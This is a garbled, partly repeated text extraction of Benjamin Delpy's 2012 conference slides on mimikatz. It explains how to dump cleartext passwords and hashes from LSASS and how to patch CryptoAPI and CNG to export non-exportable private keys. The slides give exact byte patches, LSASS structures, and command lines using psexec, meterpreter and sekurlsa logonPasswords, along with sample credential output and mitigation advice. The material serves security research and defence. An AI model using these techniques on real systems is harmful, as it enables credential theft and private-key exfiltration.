bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22
mimikatz sekurlsa livessphow
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23
0 kdgt process 0 0 lsassexePROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4
DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not AccessiblegtImage lsassexe
0 kdgt process i 83569040You need to continue execution (press g ltentergt) for the contextto be switched When the debugger breaks in again you will be inthe new process context0 kdgt gBreak instruction exception - code 80000003 (first chance)ntRtlpBreakWithStatusInstruction814b39d0 cc int 30 kdgt reload userLoading User Symbols0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g0 kdgt g
mimikatz sekurlsa livessphow
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24
lsasrvLsaProtectMemorylivesspLiveMakeSupplementalCredlivesspLiveMakeSecPkgCredentialslivesspLsaApLogonUserEx2livesspSpiLogonUserEx2
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2livesspLsaApLogonUserEx2 (74781536)[]livesspLsaApLogonUserEx2+0x560 (74781a96)call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livesspworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flinkstruct _KIWI_LIVESSP_LIST_ENTRY BlinkPVOID unk0PVOID unk1PVOID unk2PVOID unk3DWORD unk4DWORD unk5PVOID unk6LUID LocallyUniqueIdentifierLSA_UNICODE_STRING UserNamePVOID unk7PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LIST_ENTRYKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSuppDWORD unk0LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26
Me yes
mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27
lsasrvLsaProtectMemorykerberosKerbHideKeykerberosKerbCreatePrimaryCredentialskerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorykerberosKerbHidePasswordkerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorywdigestSpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL
DWORD unk0PVOID unk1PVOID unk2PVOID unk3
ifdef _M_X64BYTE unk4[32]
elif defined _M_IX86BYTE unk4[20]
endifLUID LocallyUniqueIdentifier
ifdef _M_X64BYTE unk5[44]
elif defined _M_IX86BYTE unk5[36]
endifLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flinkstruct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCountPVOID unk0PVOID unk1PVOID unk2DWORD unk3DWORD unk4PVOID unk5PVOID unk6PVOID unk7LUID LocallyUniqueIdentifier
ifdef _M_IX86DWORD unk8
endifDWORD unk9DWORD unk10PVOID unk11DWORD unk12DWORD unk13PVOID unk14PVOID unk15PVOID unk16[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsademo time
Final sekurlsa demo sekurlsalogonPasswords full
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30
mimikatz sekurlsa kerberosldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31
mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32
LsaUnprotectMemory
mimikatz sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKeyBYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copyhellip
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsamemo
Security Packages
Protection Keys
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount
LIST_ENTRYULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey
DESx lsasrvg_pDESXKeylsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
